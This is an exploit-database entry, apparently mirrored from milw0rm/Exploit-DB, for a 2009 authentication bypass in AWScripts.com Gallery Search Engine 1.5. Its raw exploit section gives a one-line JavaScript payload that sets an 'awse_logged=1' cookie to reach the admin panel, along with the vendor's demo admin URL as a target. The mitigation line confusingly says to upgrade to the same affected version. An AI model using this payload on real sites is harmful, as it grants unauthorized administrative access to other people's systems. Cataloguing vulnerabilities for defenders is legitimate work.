header-logo
Suggest Exploit
vendor:
Gallery Search Engine
by:
TiGeR-Dz
7,5
CVSS
HIGH
Cookie Insecure
200
CWE
Product Name: Gallery Search Engine
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:awscripts.com:awscripts.com_gallery_search_engine:1.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure

A vulnerability in AWScripts.com Gallery Search Engine 1.5 allows remote attackers to set arbitrary cookies via a crafted URL.

Mitigation:

Upgrade to the latest version of AWScripts.com Gallery Search Engine 1.5
Source

Exploit-DB raw data:

#################################################################################################################
[+] AWScripts.com Gallery Search Engine 1.5 Remote Cookie Insecure
[+] Discovered By TiGeR-Dz
#################################################################################################################
Cookie Insecure
+++++++++++++++++++++++++
javascript:document.cookie="awse_logged=1;path=/";
Demo
----
http://www.awscripts.com/demo_se/awse/awse_admin/index.php
################################################################################################################


# milw0rm.com [2009-06-22]

Navigation

Suggest Exploit

Services By CQR